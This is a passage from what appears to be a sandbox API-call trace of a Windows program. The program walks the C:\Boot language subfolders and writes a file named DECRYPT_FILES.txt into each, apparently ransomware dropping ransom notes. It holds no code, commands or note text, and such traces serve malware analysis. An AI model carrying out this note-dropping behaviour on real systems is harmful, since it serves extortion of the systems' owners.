ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0055.641] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.641] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0055.641] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0055.641] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0055.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0055.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0055.641] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0055.641] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU", lpFilePart=0x0) returned 0xd [0055.641] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU\\", lpFilePart=0x0) returned 0xe [0055.641] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0055.642] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.642] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0055.642] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0055.642] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0055.642] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0055.642] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0055.642] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x1f [0055.642] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d260) returned 1 [0055.642] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\DECRYPT_FILES.txt" (normalized: "c:\\boot\\ru-ru\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x408 [0055.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d1d0) returned 1 [0055.643] WriteFile (in: hFile=0x408, lpBuffer=0x2218098*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x16d2a8, lpOverlapped=0x0 | out: lpBuffer=0x2218098*, lpNumberOfBytesWritten=0x16d2a8*=0x9d5, lpOverlapped=0x0) returned 1 [0055.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0055.644] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE", lpFilePart=0x0) returned 0xd [0055.644] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE\\", lpFilePart=0x0) returned 0xe [0055.644] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0055.644] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.644] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0055.645] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0055.645] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0055.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0055.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0055.645] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0055.645] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE", lpFilePart=0x0) returned 0xd [0055.645] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE\\", lpFilePart=0x0) returned 0xe [0055.645] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0055.645] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.646] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0055.646] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0055.646] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0055.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0055.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0055.646] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x1f [0055.646] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d260) returned 1 [0055.646] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\DECRYPT_FILES.txt" (normalized: "c:\\boot\\sv-se\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x408 [0055.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d1d0) returned 1 [0055.646] WriteFile (in: hFile=0x408, lpBuffer=0x221bac0*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x16d2a8, lpOverlapped=0x0 | out: lpBuffer=0x221bac0*, lpNumberOfBytesWritten=0x16d2a8*=0x9d5, lpOverlapped=0x0) returned 1 [0055.647] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0055.647] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR", lpFilePart=0x0) returned 0xd [0055.647] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR\\", lpFilePart=0x0) returned 0xe [0055.647] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddd90 [0055.711] FindNextFileW (in: hFindFile=0x1a5ddd90, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.711] FindNextFileW (in: hFindFile=0x1a5ddd90, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0055.711] FindNextFileW (in: hFindFile=0x1a5ddd90, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0055.711] FindClose (in: hFindFile=0x1a5ddd90 | out: hFindFile=0x1a5ddd90) returned 1 [0055.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0055.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0055.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0055.711] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR", lpFilePart=0x0) returned 0xd [0055.711] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR\\", lpFilePart=0x0) returned 0xe [0055.711] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddd90 [0055.712] FindNextFileW (in: hFindFile=0x1a5ddd90, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.712] FindNextFileW (in: hFindFile=0x1a5ddd90, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0055.712] FindNextFileW (in: hFindFile=0x1a5ddd90, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0055.712] FindClose (in: hFindFile=0x1a5ddd90 | out: hFindFile=0x1a5ddd90) returned 1 [0055.712] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0055.712] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0055.712] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x1f [0055.712] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d260) returned 1 [0055.712] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\DECRYPT_FILES.txt" (normalized: "c:\\boot\\tr-tr\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3d4 [0055.713] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d1d0) returned 1 [0055.713] WriteFile (in: hFile=0x3d4, lpBuffer=0x221f5c8*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x16d2a8, lpOverlapped=0x0 | out: lpBuffer=0x221f5c8*, lpNumberOfBytesWritten=0x16d2a8*=0x9d5, lpOverlapped=0x0) returned 1 [0055.714] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0055.714] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN", lpFilePart=0x0) returned 0xd [0055.714] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN\\", lpFilePart=0x0) returned 0xe [0055.714] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddd90 [0055.714] FindNextFileW (in: hFindFile=0x1a5ddd90, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.714] FindNextFileW (in: hFindFile=0x1a5ddd90, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0055.715] FindNextFileW (in: hFindFile=0x1a5ddd90, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0055.715] FindClose (in: hFindFile=0x1a5ddd90 | out: hFindFile=0x1a5ddd90) returned 1 [0055.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0055.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0055.715] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0055.715] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN", lpFilePart=0x0) returned 0xd [0055.715] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN\\", lpFilePart=0x0) returned 0xe [0055.715] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddd90 [0055.715] FindNextFileW (in: hFindFile=0x1a5ddd90, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.715] FindNextFileW (in: hFindFile=0x1a5ddd90, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0055.715] FindNextFileW (in: hFindFile=0x1a5ddd90, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0055.716] FindClose (in: hFindFile=0x1a5ddd90 | out: hFindFile=0x1a5ddd90) returned 1 [0055.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0055.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0055.716] GetFullPathNameW (in: 